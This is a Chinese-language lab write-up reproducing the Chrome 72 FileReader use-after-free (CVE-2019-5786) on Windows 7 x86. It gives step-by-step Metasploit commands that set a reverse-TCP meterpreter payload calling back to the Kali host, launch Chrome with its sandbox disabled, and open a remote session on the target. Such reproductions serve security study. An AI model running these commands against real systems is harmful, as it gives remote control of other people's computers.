CVE-2019-5786漏洞复现

流过昼夜 提交于 2020-02-28 14:46:58

漏洞影响范围:
CVE-2019-5786适用于Windows 7 x86的Chrome 72.0.3626.119稳定FileReader UaF攻击。

环境

kali
win7 x86
Google_Chrome_(32bit)_v72.0.3626.119

复现

kali启动msf,搜索chrome_filereader利用模块

root@kali:~# msfconsole -q
msf5 > search chrome_filereader

在这里插入图片描述选择模块,查看模块信息

msf5 > use exploit/windows/browser/chrome_filereader_uaf
msf5 exploit(windows/browser/chrome_filereader_uaf) > info

在这里插入图片描述
漏洞介绍
在这里插入图片描述
选择payload

msf5 exploit(windows/browser/chrome_filereader_uaf) > set payload windows/meterpreter/reverse_tcp

在这里插入图片描述
设置payload参数,LHOST设置为kali ip

msf5 exploit(windows/browser/chrome_filereader_uaf) > set URIPATH /
msf5 exploit(windows/browser/chrome_filereader_uaf) > set LHOST 192.168.159.141

在这里插入图片描述创建服务
在这里插入图片描述
在win7 x86中打开Google Chrome文件位置
在这里插入图片描述
地址栏输入cmd,回车。出现当前目录下的终端
执行语句(以沙箱关闭的状态执行chrome.exe)

C:\Program Files\Google\Chrome\Application>chrome.exe --no-sandbox

在这里插入图片描述
在通过此命令打开的chrome浏览器地址栏中输入地址:
http://192.168.159.141:8080
在这里插入图片描述
kali成功获得session
在这里插入图片描述
选择生成的session

msf5 exploit(windows/browser/chrome_filereader_uaf) > sessions 1

在这里插入图片描述
查看当前系统信息,用户权限

meterpreter > sysinfo
meterpreter > getuid

在这里插入图片描述

技术无罪,请勿用于恶意用途。

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!